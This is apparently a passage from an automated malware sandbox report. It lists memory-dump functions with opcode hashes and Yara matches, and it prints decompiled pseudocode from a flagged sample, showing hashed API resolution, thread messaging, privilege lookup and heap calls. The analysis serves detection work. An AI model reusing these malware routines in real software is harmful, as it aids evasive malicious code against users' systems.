                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 45c1b690913f4ebe220028810a02cbcd984dac01828d952c9f1ed5e8ded5cbe5
                                            • Instruction ID: 91357d1f13e8267e36db19f8b42369fa2da2f5bc6e33c744dc0831754a86d323
                                            • Opcode Fuzzy Hash: 45c1b690913f4ebe220028810a02cbcd984dac01828d952c9f1ed5e8ded5cbe5
                                            • Instruction Fuzzy Hash: E190027220101413D211615945047470449D7D0381FD1C876A0414558D969689A2F1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b11e20e2534a05002ac1e22b274ef500aa8ed6efdc03deaeb102562ff076f070
                                            • Instruction ID: 2cd3385f015d64075c4d06ba46aca9257d13101c4d69196db5cb460a5a6a3bb1
                                            • Opcode Fuzzy Hash: b11e20e2534a05002ac1e22b274ef500aa8ed6efdc03deaeb102562ff076f070
                                            • Instruction Fuzzy Hash: BF900262242051525645B15944045474446E7E03817D1C476A1404950C856698A6E6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b696000d4c1cdeb7ec559bd7cc348334622c98362ab7a3b2b52d51c7f77da563
                                            • Instruction ID: edd3adc0e7d7b1e1c63f73c0789b1c1c083eb92ff36d3406f49c88e5611999bc
                                            • Opcode Fuzzy Hash: b696000d4c1cdeb7ec559bd7cc348334622c98362ab7a3b2b52d51c7f77da563
                                            • Instruction Fuzzy Hash: CD9002A234101442D20061594414B460445D7E1341F91C479E1054554D8659CCA2B1A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5c163c804892b272d779372f66361fba962c5d844e58d38492b96e019c235fe3
                                            • Instruction ID: b8c8f4c6be82913c39bffaeb979c3e2320e526f576825a22e244d938da1b86bc
                                            • Opcode Fuzzy Hash: 5c163c804892b272d779372f66361fba962c5d844e58d38492b96e019c235fe3
                                            • Instruction Fuzzy Hash: 359002A220201003420571594414656444AD7E0341B91C475E1004590DC56588E1B1A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fa1c93ddda2d9c327977bbe579b723b9dfd34a9b7c2e0a81abb52daa2cbe440b
                                            • Instruction ID: d974365aa23a72b55b6c2c8f5747e36cb3ad6ac96b2b3091f16439af79ee0b85
                                            • Opcode Fuzzy Hash: fa1c93ddda2d9c327977bbe579b723b9dfd34a9b7c2e0a81abb52daa2cbe440b
                                            • Instruction Fuzzy Hash: 1C9002B220101402D240715944047860445D7D0341F91C475A5054554E86998DE5B6E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f90e96be684ddbca7b3c996f4d6d17ecb78e8673d430fab38872c6d737d5b498
                                            • Instruction ID: a6121db2bf1bbf8c138d1cd3ccf670cb6a14256d4302e6a35762b0352766df0b
                                            • Opcode Fuzzy Hash: f90e96be684ddbca7b3c996f4d6d17ecb78e8673d430fab38872c6d737d5b498
                                            • Instruction Fuzzy Hash: 9A900266211010030205A55907045470486D7D5391391C475F1005550CD66188B1A1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 05ff8cb6cb6455544a44d26b39bf5981e6119eb8422910f5a1067ac327559c8f
                                            • Instruction ID: 0b1bbf375f832dbfa726df4a6c6d2a3c21f0a7d679fbf55a174b5e7b34aee108
                                            • Opcode Fuzzy Hash: 05ff8cb6cb6455544a44d26b39bf5981e6119eb8422910f5a1067ac327559c8f
                                            • Instruction Fuzzy Hash: 2F90027220109802D2106159840478A0445D7D0341F95C875A4414658D86D588E1B1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 265b439cad6c0991a8e22cba7f45e320533c97fb1dd9498078637c7472608679
                                            • Instruction ID: a0b930abfb394b0f8a1c951306ceb4bfc832ddf8b90e39dfd7afae5bb07564fa
                                            • Opcode Fuzzy Hash: 265b439cad6c0991a8e22cba7f45e320533c97fb1dd9498078637c7472608679
                                            • Instruction Fuzzy Hash: 45900262601010424240716988449464445FBE1351791C575A0988550D859988B5A6E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3abd2c4436e3685ecc0ecae28748eea317ce35c9c173a67287c0422960521210
                                            • Instruction ID: 8441ce461e48a6cef1d313b1cc4b03332679651fb4b3c7bba2ba925ec9e932ca
                                            • Opcode Fuzzy Hash: 3abd2c4436e3685ecc0ecae28748eea317ce35c9c173a67287c0422960521210
                                            • Instruction Fuzzy Hash: 2490027220141402D2006159481474B0445D7D0342F91C475A1154555D866588A1B5F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 65e508a756b443e187ea5e343dde9cfce906d84ce88fcd0813d8982ee424408e
                                            • Instruction ID: 21ff3d02950b660b7dabcee2c91836f37840b0ada37d19255ff15d64dbe942eb
                                            • Opcode Fuzzy Hash: 65e508a756b443e187ea5e343dde9cfce906d84ce88fcd0813d8982ee424408e
                                            • Instruction Fuzzy Hash: CC90027220101802D2807159440468A0445D7D1341FD1C479A0015654DCA558AA9B7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fb6b482b68f9ad60f9c70971256df425afdc902c30eee04983305f2a4c98a493
                                            • Instruction ID: ace3c59f3e87232f862e835dd152d11cd2dd06bacfd240c03e2178b1b6488f82
                                            • Opcode Fuzzy Hash: fb6b482b68f9ad60f9c70971256df425afdc902c30eee04983305f2a4c98a493
                                            • Instruction Fuzzy Hash: BD90026221181042D30065694C14B470445D7D0343F91C579A0144554CC95588B1A5A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 764f03febf25950c4b17bc90a44ad3b1679e75e551fdd76726923998e8142769
                                            • Instruction ID: bf58ffaa9dac89db1f77da093f90f33ce7a0828b4be068a0f121a59a637e6e6f
                                            • Opcode Fuzzy Hash: 764f03febf25950c4b17bc90a44ad3b1679e75e551fdd76726923998e8142769
                                            • Instruction Fuzzy Hash: 5990026230101003D240715954186464445E7E1341F91D475E0404554CD95588A6A2A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b48a7390de83359ef2304fe5688021eb5c9ba7063452a418ca98125ff940a380
                                            • Instruction ID: df5cadbf504de8eeb48d1f10f33e75327495d7e611725e5cffbc1ca0a0c02521
                                            • Opcode Fuzzy Hash: b48a7390de83359ef2304fe5688021eb5c9ba7063452a418ca98125ff940a380
                                            • Instruction Fuzzy Hash: 5290026A21301002D2807159540864A0445D7D1342FD1D879A0005558CC95588B9A3A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 42d546b2ccde29aa5e9749d4c4ff1fcc8476105cbf3915c11236b692831b6886
                                            • Instruction ID: 27257288278f352b8005f91479d720a2627998e7adad8108b401328087ec486d
                                            • Opcode Fuzzy Hash: 42d546b2ccde29aa5e9749d4c4ff1fcc8476105cbf3915c11236b692831b6886
                                            • Instruction Fuzzy Hash: D790027220101402D200659954086860445D7E0341F91D475A5014555EC6A588E1B1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                            • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                            • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                            • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082EA, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 45%
                                            			E004082EA(void* __eax, void* __edi, signed int __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				signed int _v326413041;
				void* _t16;
				int _t17;
				void* _t24;
				long _t25;
				signed int _t28;
				intOrPtr _t29;
				int _t30;
				void* _t33;
				void* _t35;
				signed int _t40;
				intOrPtr _t41;

				_t24 = __eax;
				asm("out dx, eax");
				_t28 = __esi & _v326413041;
				_t40 = _t28;
				_t33 = _t35;
				_push(_t28);
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t29 = _a4;
				if(_t40 == 0) {
					_push( &_v68);
					_t29 = _t29 + 0x1c;
					_t41 = _t29;
					_push(_t29); // executed
				}
				_t16 = E0040ACD0(_t41); // executed
				_t17 = L00414E20(_t29, _t16, 0, 0, 0xc4e7b6d6);
				_t30 = _t17;
				if(_t30 != 0) {
					_push(_t24);
					_t25 = _a8;
					_t17 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t43 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t30(_t25, 0x8003, _t33 + (E0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}

















                                            0x004082ea
                                            0x004082eb
                                            0x004082ed
                                            0x004082ed
                                            0x004082f1
                                            0x004082f6
                                            0x004082ff
                                            0x00408303
                                            0x0040830e
                                            0x00408313
                                            0x00408314
                                            0x00408319
                                            0x0040831a
                                            0x0040831a
                                            0x0040831d
                                            0x0040831d
                                            0x0040831e
                                            0x0040832e
                                            0x00408333
                                            0x0040833a
                                            0x0040833c
                                            0x0040833d
                                            0x0040834a
                                            0x0040834c
                                            0x0040834e
                                            0x0040836b
                                            0x0040836b
                                            0x0040836d
                                            0x00408372

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: d5b26fb49fd02839353d2910a504c6bd434ae9aef0d50c2729b65f95eb303eb8
                                            • Instruction ID: 2a5eef8f901314b0843d7a4e3f3ed9fc11bc8c2e66449285936594633f3e174b
                                            • Opcode Fuzzy Hash: d5b26fb49fd02839353d2910a504c6bd434ae9aef0d50c2729b65f95eb303eb8
                                            • Instruction Fuzzy Hash: 6901DD31A802297AE710A6559C42FFF772CAB40F54F054019FF04BA1C1D6A9691647E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E004082F0(void* __ecx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				intOrPtr _t31;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t24 = _a4;
				if(_t30 == 0) {
					_push( &_v68);
					_t24 = _t24 + 0x1c;
					_t31 = _t24;
					_push(_t24); // executed
				}
				_t12 = E0040ACD0(_t31); // executed
				_t13 = L00414E20(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t22, 0x8003, _t26 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}














                                            0x004082f0
                                            0x004082ff
                                            0x00408303
                                            0x0040830e
                                            0x00408313
                                            0x00408314
                                            0x00408319
                                            0x0040831a
                                            0x0040831a
                                            0x0040831d
                                            0x0040831d
                                            0x0040831e
                                            0x0040832e
                                            0x00408333
                                            0x0040833a
                                            0x0040833d
                                            0x0040834a
                                            0x0040834c
                                            0x0040834e
                                            0x0040836b
                                            0x0040836b
                                            0x00000000
                                            0x0040836d
                                            0x00408372

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                            • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                            • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                            • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082B4, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 36%
                                            			E004082B4(void* __edi, void* __eflags) {
				void* _t7;
				int _t8;
				intOrPtr _t11;
				void* _t12;
				void* _t15;
				void* _t18;
				long _t19;
				int _t21;
				int _t22;
				void* _t26;

				_t18 = __edi;
				es = __edi;
				asm("hlt");
				asm("aam 0x2f");
				asm("lahf");
				if(__eflags != 0) {
					if(__eflags == 0) {
						_push(_t26 - 0x40);
						_t21 = _t21 + 0x1c;
						__eflags = _t21;
						_push(_t21); // executed
					}
					_t7 = E0040ACD0(__eflags); // executed
					_t8 = L00414E20(_t21, _t7, 0, 0, 0xc4e7b6d6);
					_t22 = _t8;
					__eflags = _t22;
					if(_t22 != 0) {
						_push(_t18);
						_t19 =  *(_t26 + 0xc);
						_t8 = PostThreadMessageW(_t19, 0x111, 0, 0); // executed
						__eflags = _t8;
						if(__eflags == 0) {
							_t8 =  *_t22(_t19, 0x8003, _t26 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t8);
						}
					}
					return _t8;
				} else {
					_t11 =  *0x563b268c;
					_push(_t21);
					_t12 = E0041B2A0(_t11, _t15, 0x11c6f95e);
					return E0041B150(_t15) + _t12 + 0x1000;
				}
			}













                                            0x004082b4
                                            0x004082b4
                                            0x004082b6
                                            0x004082b7
                                            0x004082b9
                                            0x004082ba
                                            0x00408314
                                            0x00408319
                                            0x0040831a
                                            0x0040831a
                                            0x0040831d
                                            0x0040831d
                                            0x0040831e
                                            0x0040832e
                                            0x00408333
                                            0x00408338
                                            0x0040833a
                                            0x0040833c
                                            0x0040833d
                                            0x0040834a
                                            0x0040834c
                                            0x0040834e
                                            0x0040836b
                                            0x0040836b
                                            0x0040836d
                                            0x00408372
                                            0x004082bc
                                            0x004082bc
                                            0x004082c0
                                            0x004082c6
                                            0x004082dd
                                            0x004082dd

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: de1e0d92b6ecf77f32070f4208c109dfdd12e0b4867e729d3a71f3bc223bba47
                                            • Instruction ID: 7f6eeffa05ea93399c95f5b2e60ad50501f8bff5ba0d770fd4db3e3038a0bd11
                                            • Opcode Fuzzy Hash: de1e0d92b6ecf77f32070f4208c109dfdd12e0b4867e729d3a71f3bc223bba47
                                            • Instruction Fuzzy Hash: B501203194021476DA20AAA45C43FFE2318A780F15F05416FFF44BB1C1DABD590546E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 46%
                                            			E0041A1C1(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* __esi;
				signed int __ebp;
				intOrPtr* _t22;
				void* _t24;

				if(__eflags < 0) {
					 *0x094C3802 =  *0x094C3802 & __ecx;
					asm("sbb [ebx-0x74adeb3c], al");
					asm("adc al, 0x50");
					return  *((intOrPtr*)( *_t22))(_a12, _a16, __edx, __ecx, _t24);
				} else {
					__eax = __eax << __cl;
					__eflags =  *((intOrPtr*)(__edi + 0x26)) - __ah;
					__esp = __esp ^  *(__edx - 0x1374aac0);
					__eflags = __esp;
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0xa18));
					__esi = __eax + 0xc8c;
					__eax = E0041A960(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
					__edx = _a16;
					__eax = _a12;
					__ecx = _a8;
					__edx =  *__esi;
					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                            0x0041a1c6
                                            0x0041a1a1
                                            0x0041a1a7
                                            0x0041a1ae
                                            0x0041a1c0
                                            0x0041a1c8
                                            0x0041a1c8
                                            0x0041a1ca
                                            0x0041a1cd
                                            0x0041a1cd
                                            0x0041a1d1
                                            0x0041a1d3
                                            0x0041a1d6
                                            0x0041a1e2
                                            0x0041a1ea
                                            0x0041a1ef
                                            0x0041a1f2
                                            0x0041a1f5
                                            0x0041a1fc
                                            0x0041a200
                                            0x0041a202
                                            0x0041a203
                                            0x0041a204
                                            0x0041a204

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 71b008811e7eb22941acd3a83fa698d2989a21c35c06f682cec1c7bd0b2ddd2e
                                            • Instruction ID: 5e876629a821ffc6391a26ddbcb153cc47e541d699c30c05772f0983f65afc96
                                            • Opcode Fuzzy Hash: 71b008811e7eb22941acd3a83fa698d2989a21c35c06f682cec1c7bd0b2ddd2e
                                            • Instruction Fuzzy Hash: 8F01DCB16042447BEB14DF95DC84DE777A8EF88220F04829DFD0C8B642CA34A8248BB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x0041a07f
                                            0x0041a087
                                            0x0041a09d
                                            0x0041a0a1

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x0041a047
                                            0x0041a05d
                                            0x0041a061

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                            0x0041a1ea
                                            0x0041a200
                                            0x0041a204

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                            0x0041a0b3
                                            0x0041a0ca
                                            0x0041a0d8

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00B0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
